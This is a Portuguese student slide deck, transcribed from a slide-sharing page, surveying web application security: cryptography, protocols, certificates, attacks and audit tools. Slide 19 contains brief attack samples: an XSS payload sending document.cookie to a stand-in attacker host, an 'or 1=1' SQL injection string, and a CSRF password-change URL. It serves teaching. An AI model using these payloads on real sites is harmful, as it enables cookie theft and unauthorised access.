A apresentação está carregando. Por favor, espere

A apresentação está carregando. Por favor, espere

SEGURANÇA DE APLICAÇÕES NA WEB

Apresentações semelhantes


Apresentação em tema: "SEGURANÇA DE APLICAÇÕES NA WEB"— Transcrição da apresentação:

1 SEGURANÇA DE APLICAÇÕES NA WEB
Aluno: Thiago Augusto Lopes Genez Orientador: Mario Lemes Proença Jr.

2 Sumário Introdução Conceitos Básicos de Segurança
Algoritmos Criptográficos Protocolos de Segurança Identificação Digital Os Ataques Ferramentas de Auditoria de Segurança

3 Introdução Aplicação WEB: Necessidade da Segurança
Acessada por um navegador WEB Meio de comunicação O canal é inseguro  Internet Exemplos: E-commerce, Banking on-line Necessidade da Segurança Ausência da segurança Falta de manutenção e/ou configuração específica da segurança Falta de atualizações diárias Cada dia novos ataques são descobertos A camada da aplicação possui falhas de segurança

4 Introdução Problema da insegurança nas aplicações WEB: Solução:
Divulgação dos dados confidenciais “Quebra” do sigilo Perda da confiabilidade pelo usuário. Informações caírem em “mãos erradas” Solução: Criptografia, protocolos criptográficos, identificação digital e ferramentas de auditoria. Objetivo Garantir que as informações mantenham-se intactas e protegidas durante a sua transmissão na Internet. Garantir um ambiente WEB seguro.

5 Conceitos Básicos de Segurança
Serviços disponibilizados pela segurança: Autenticação Confidencialidade Integridade Não-repúdio Controle de Acesso Disponibilidade Tipos de ataques contra a Segurança Objetivo dos ataques: minimizar os serviços de segurança

6 Conceitos Básicos de Segurança

7 Conceitos Básicos de Segurança
Classificação dos ataques Ataques passivos: sem modificação do conteúdo “Libertação” do conteúdo da mensagem Análise de tráfego Ataques Ativos: com modificação do conteúdo Disfarçado Mensagens repetitivas Modificação de Mensagens Negação de Serviço (DoS)

8 Conceitos Básicos de Segurança
O Problema da Segurança no Ambiente WEB Ocorrem nos Browsers: Cookies, Applets, ActiveX, AJAX Entrada de dados não validado nas aplicações WEB Solucionando o problema de segurança na WEB: Proteger : O servidor WEB e os respectivos dados internos As informações que trafegam entre o servidor e o usuário Planejar uma arquitetura de segurança para as aplicações no seu ciclo de vida Os usuário finais devem navegar em uma plataforma segura.

9 Conceitos Básicos de Segurança

10 Algoritmos Criptográficos
Origem etimológica grega: Ckryptós  “escondido” Gráphein  “escrever”. Objetivo: Texto legível Cifra  texto ilegível Divididos em: Simétrico Codificação em Blocos Codificação em Fluxo Assimétrico Criptogrifia, Assinatura Digital e Troca de Chaves Funções Hash

11 Algoritmos Criptográficos Simétricos
Bloco Chave Informações RC4 Fluxo bits Internet Banking Caixa Econômica Federal, Banco do Brasil, Itaú RC5 bits bits Chave 64 quebrada, chave 72 bits segura RC6 128 bits bits Ficou no 4° colocado do AES DES 64 bits Defasado, 1998 quebrado por hardware TDES 168 bits Comércio eletrônico PayPal AES 1997-Rijndael, pagseguro (UOL) Blowfish 64 ou 128 bits Plataforma OpenBSD Twofish 256 bits Ficou no 3° colocado do AES Serpent Ficou no 2° colocado do AES

12 Algoritmos Criptográficos Assimétricos
Fornece Chave Informações RSA Criptografia Assinatura digital Troca de Chaves bits Utilizado na maioria dos certificados digitais Diffie-Hellman Troca de chaves bits Necessita de mecanismo extra para garantir autenticidade DSA Assinatura Digital 1024 bits Proposto em 1991 para ser o padrão para assinaturas digitais ECC bits Desafiar e concorrer o RSA. Usado no DNSCurve ECDSA 160 bits Concorrente ao DSA

13 Algoritmos Criptográficos Funções Hash
Tamanho Hash Informações MD5 128 bits Não é resistente a colisão (2008) MD6 512 bits Não avançou para a segunda fase do concurso SHA-3 em julho 2009 SHA-1 160 bits Não é resistente a colisão SHA-2 224, 256, 384, 512 bits Nenhum tipo de ataque foi relatado e a partir de 2010 todas agencias federais USA tem que substituir o SHA-1 para SHA-2 SHA-3 Concurso proposto pela NIST. (andamento na 2° fase, resultado sairá em 2012)

14 Protocolos de Segurança
Ação Fornece Informações SSL/TLS Entre as camadas de Transporte e a camada de aplicação Criptografia (três tipos), Certificados Digitais Podem acoplar protocolos de alto nível: Ex, HTTPS Ponto a Ponto IPsec Na camada de Rede (pacote IP criptografado) Autenticação, Criptografia e Gerenciamento de chaves Integrado no IPv6 Proteção nativa para todos os protocolos acima da camada de rede WS-Security Camada de aplicação Criptografia XML Assinatura XML Web Services SOAP Fim a Fim DNSSec Serviço DNS Autenticação Protege ataques DNS Spoofing (Falso DNS) DNSCurve Criptografia Protege ataques DoS

15 Protocolos de Segurança SSL/TLS x WS-Security
Informação está segura no canal Protege toda a mensagem Comunicação ponto a ponto Garante a segurança em todos os estágio da comunicação Protege somente as porções da mensagem que precisa de segurança Comunicação fim a fim

16 Identificação Digital
Transações eletrônicas: Integridade, autenticidade e confidencialidade Assinatura Digital Bloco de dados criptografado anexado a mensagem Fornece: Autenticação, Integridade e Não repúdio Não garante a confidencialidade

17 Identificação Digital Certificado Digital
Distribuir as chaves públicas de pessoas físicas e/ou jurídicas de forma segura. Autoridade Certificadora (AC) Terceiro Confiável

18 Ataques Para proteger dos ataques é necessário conhecê-los “Passos”:
Reconhecimento do Alvo (DNS) Verificar a segurança da Rede O Ataque “Lá Dentro” Ataque de força bruta Ataque do Homem do Meio (Man-in-the-middle) Ataque contra as aplicações WEB Páginas dinâmicas Código executados no cliente (script client-side) Aplicação WEB + Servidor WEB +Banco de Dados Problema: Entrada dos dados não são tratados Dados armazenados em Cookies

19 Ataques XSS (Cross Site Scripting) Injeção SQL Phishing DNS Spoofing
servidor.invasor.com/roubarCookie.php?’+document.cookie</script> Injeção SQL SELECT * FROM users WHERE username = ’" + username + "’ AND password = ’" + password + "’"; SELECT * FROM users WHERE username = ’’ or 1=1;--’ AND password = ’’; CSRF (Cross-site reference forgery) Manipula a sessão ativa da vítima (Cookie roubado) Altera os valores: nova_senha= &confirma_nova_senha= Phishing google.com  googIe.com DNS Spoofing Clickjacking Consegue entrar sem conhecer o nome do usuario e a senha Roubo dos cookies Injeção SQL. SELECT * FROM users WHERE username = ’ + username + ’ AND password = ’ + password + ’ ; SELECT * FROM users WHERE username = ’’ or 1=1;--’ AND password = ’’; CSRF (Cross-site reference forgery) Manipula a sessão ativa da vítima (Cookie roubado) http://site.vulneravel.com/index.php?pagina=altera_senha.php. Altera os valores: nova_senha=12345678&confirma_nova_senha=12345678. Phishing. google.com  googIe.com. DNS Spoofing. Clickjacking. Consegue entrar sem conhecer o nome do usuario e a senha. Roubo dos cookies.", "width": "800" }

20 Ferramentas de Auditoria de Segurança
Não é trivial encontrar vulnerabilidades das aplicações. Maioria das soluções propostas Não garante a proteção na lógica da aplicação Aplicações desenvolvidas sem uma segurança na camada da aplicação A segurança não incluída no ciclo de vida do software Entrada dados não validados  deixa a aplicação instável Ferramentas de auditoria Minimiza as vulnerabilidades Objetivo de testar a segurança na camada de aplicação Funcionam como um proxy Manipulações dos pedidos e respostas HTTP/HTTPS Age como: “Homem do meio”

21 Ferramentas de Auditoria de Segurança
Funções\Ferramenta RatProxy Web Scarab Paros Burp Proxy w3af IBM AppScan Licença Livre Sim Não Multiplataforma Manipula pedidos/resposta HTTP(S) Relatório detalhado Sugestão para Correção Suporte SSL/TLS XSS, Injeção SQL, CSR Análise de Cookies Análise de dados ocultos Análise RESTful Ambiente Desenvolvimento

22 Conclusão Base da segurança: Criptografia
Comunicação entre usuário final e a aplicação WEB: Navegador WEB (browser) Canal é inseguro  Internet Solução: Protocolos Criptográficos Outra solução: identificação digital Transações eletrônicas: Integridade, Autenticidade e Confidencialidade Não garante a proteção na lógica da aplicação Linguagens WEB dinâmicas Entrada de dados não validados Deixa a aplicação WEB instável  facilita os ataques Ferramentas de auditoria  procura as vulnerabilidades Computação na nuvem (cloud computing)

23 Obrigado


Carregar ppt "SEGURANÇA DE APLICAÇÕES NA WEB"

Apresentações semelhantes


Anúncios Google